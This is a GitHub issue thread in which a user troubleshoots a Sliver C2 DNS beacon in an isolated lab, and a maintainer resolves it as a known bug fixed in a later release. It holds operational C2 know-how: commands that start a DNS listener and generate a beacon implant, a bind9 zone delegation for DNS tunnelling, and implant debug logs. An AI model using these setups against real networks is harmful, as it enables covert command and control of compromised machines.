DNS beacon not working

[chromefinch]

Describe the bug I've got mtls working no problem, but no luck with DNS

To Reproduce I'm using two kali boxes, one red 192.168.43.50 and one purple192.168.42.100 with ubuntu server running bind9 192.168.43.100 this is all off line so any domain will do but here's what I'm using: [server] sliver > dns -d bad.airgapped.zip
[server] sliver > generate beacon --dns bad.airgapped.zip --seconds 10 --jitter 0 --os linux -d

now when I go to connect, I'm able to resolve the weird subdomains but there is no implant connection weird subdomain taken from debug implant execution nslookup baakb60un0qa.bad.airgapped.zip.
Server: 192.168.43.100 Address: 192.168.43.100#53

Non-authoritative answer: Name: baakb60un0qa.bad.airgapped.zip Address: 30.176.115.139

here's some of the debug output

./SLIPPERY_WITHDRAWAL
2023/09/12 00:05:07 sliver.go:99: Hello my name is SLIPPERY_WITHDRAWAL 2023/09/12 00:05:07 limits.go:58: Limit checks completed 2023/09/12 00:05:07 sliver.go:116: Running in Beacon mode with ID: 86a2a82a-ecad-466f-80c2-b2767b5310dc 2023/09/12 00:05:07 beacon.go:102: Starting beacon loop ... 2023/09/12 00:05:07 transports.go:41: Starting c2 url generator () ... 2023/09/12 00:05:07 transports.go:104: Return generator: (chan *url.URL)(0xc000038720) 2023/09/12 00:05:07 beacon.go:118: Recv from c2 generator ... 2023/09/12 00:05:07 transports.go:92: Yield c2 uri = 'dns://bad.airgapped.zip' 2023/09/12 00:05:07 transports.go:92: Yield c2 uri = 'dns://bad.airgapped.zip' 2023/09/12 00:05:07 beacon.go:122: Next CC = dns://bad.airgapped.zip 2023/09/12 00:05:07 beacon.go:122: Next CC = dns://bad.airgapped.zip 2023/09/12 00:05:07 transports.go:92: Yield c2 uri = 'dns://bad.airgapped.zip' 2023/09/12 00:05:07 sliver.go:125: Next beacon = &{0xa59680 0xa5d6a0 0xa59540 0xa595c0 0xa5d6e0 0xa594e0 dns://bad.airgapped.zip } 2023/09/12 00:05:07 dnsclient.go:152: DNS client connecting to 'bad.airgapped.zip' (timeout: 5s) ... 2023/09/12 00:05:07 dnsclient.go:299: [dns] found resolvers: [192.168.43.100] 2023/09/12 00:05:07 crypto.go:227: TOTP Code: 97209650 2023/09/12 00:05:07 dnsclient.go:717: [dns] Fetching dns session id via 'baakb60un0qa.bad.airgapped.zip.' ... 2023/09/12 00:05:07 resolver-generic.go:92: [dns] 192.168.43.100:53->A record of baakb60un0qa.bad.airgapped.zip. ? 2023/09/12 00:05:07 resolver-generic.go:175: [dns] rtt->192.168.43.100:53 1.586168ms (err: ) 2023/09/12 00:05:07 resolver-generic.go:109: [dns] answer (a): 113.182.110.62 2023/09/12 00:05:07 dnsclient.go:738: [dns] dns session id: 7255665 2023/09/12 00:05:07 dnsclient.go:834: [dns] Fingerprinting 1 resolver(s) ... 2023/09/12 00:05:07 resolver-generic.go:92: [dns] 192.168.43.100:53->A record of 1cryt78c3424q9bnjzzgxmex.bad.airgapped.zip. ? 2023/09/12 00:05:07 resolver-generic.go:175: [dns] rtt->192.168.43.100:53 789.448µs (err: ) 2023/09/12 00:05:07 resolver-generic.go:109: [dns] answer (a): 95.77.200.80 2023/09/12 00:05:07 resolver-generic.go:92: [dns] 192.168.43.100:53->A record of 1cryt78c342gj08zvqachpfq.bad.airgapped.zip. ? 2023/09/12 00:05:07 resolver-generic.go:175: [dns] rtt->192.168.43.100:53 733.969µs (err: ) 2023/09/12 00:05:07 resolver-generic.go:109: [dns] answer (a): 91.42.2.94 2023/09/12 00:05:07 resolver-generic.go:92: [dns] 192.168.43.100:53->A record of 1cryt78c3427rh9uc8daychg.bad.airgapped.zip. ?

here's some of the bind9 config:

/etc/bind/named.conf.options
acl "localnet" { 192.168.43.0/24; 192.168.42.0/24; };

options { directory "/var/cache/bind";

    recursion yes;                     # resursive queries
    allow-recursion { localnet; };     # recursive queries

    listen-on { 192.168.43.100; };    # IP address of the DNS server
    allow-transfer { none; };          # disable zone transfers

    forwarders {
            8.8.8.8;
            8.8.4.4;
    };

    dnssec-validation auto;

    listen-on-v6 { any; };

};

zone "airgapped.zip" IN { type master; file "/etc/bind/zones/db.airgapped.zip"; forwarders {};

};

/etc/bind/zones/db.airgapped.zip
$TTL 604800 ;ORIGIN airgapped.zip @ IN SOA ns1.airgapped.zip. admin.airgapped.zip. ( 1234567894 ; Serial 604800 ; Refresh 86400 ; Retry 2419200 ; Expire 604800 ) ; Negative Cache TTL

    IN      NS      ns1.airgapped.zip.

ns1 IN A 192.168.43.100

; 192.168.43.0/24 - A records elmo.airgapped.zip. IN A 192.168.43.50 bad.airgapped.zip. 360 IN NS elmo.airgapped.zip.

Expected behavior A clear and concise description of what you expected to happe

Desktop (please complete the following information):

• OS: Kali
• Version 1.5.40

Additional context idk man, I'm the worst

[chromefinch]

I just updated to 1.5.41

[chromefinch]

here's a tcpdump port 53 on the Kali box

listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes 07:45:16.335127 IP 192.168.43.100.55536 > 192.168.43.50.domain: 1964 A? baakb20vv4c8.bad.airgapped.zip. (48) 07:45:16.335682 IP 192.168.43.50.domain > 192.168.43.100.55536: 1964*- 1/0/0 A 221.91.184.120 (94) 07:45:16.336648 IP 192.168.43.100.34877 > 192.168.43.50.domain: 7234 A? 1c7vjr4d34255ayh276fyxp8.bad.airgapped.zip. (60) 07:45:16.336872 IP 192.168.43.50.domain > 192.168.43.100.34877: 7234*- 1/0/0 A 221.132.181.166 (118) 07:45:16.337530 IP 192.168.43.100.56987 > 192.168.43.50.domain: 2780 A? 1c7vjr4d342726tujhv0y9mc.bad.airgapped.zip. (60) 07:45:16.337701 IP 192.168.43.50.domain > 192.168.43.100.56987: 2780*- 1/0/0 A 71.184.116.15 (118)

[moloch--]

Duplicate of #1354 sorry for the delays in getting a fix out, I've been preoccupied with work for my day job heh.

[chromefinch]

Duplicate of #1354 sorry for the delays in getting a fix out, I've been preoccupied with work for my day job heh.

Oh no dude!! I thought it was me!! thanks for the sanity check. It's been driving me nuts! thought for sure it was me.

[chromefinch]

uninstalled; https://github.com/BishopFox/sliver/issues/1390#issuecomment-1701268939 deleted .sliver from home installed per the issue you added; https://github.com/BishopFox/sliver/issues/1354#issuecomment-1711267923 got it working.

fantastic. Thank you again.

[moloch--]

Fixed in v1.5.42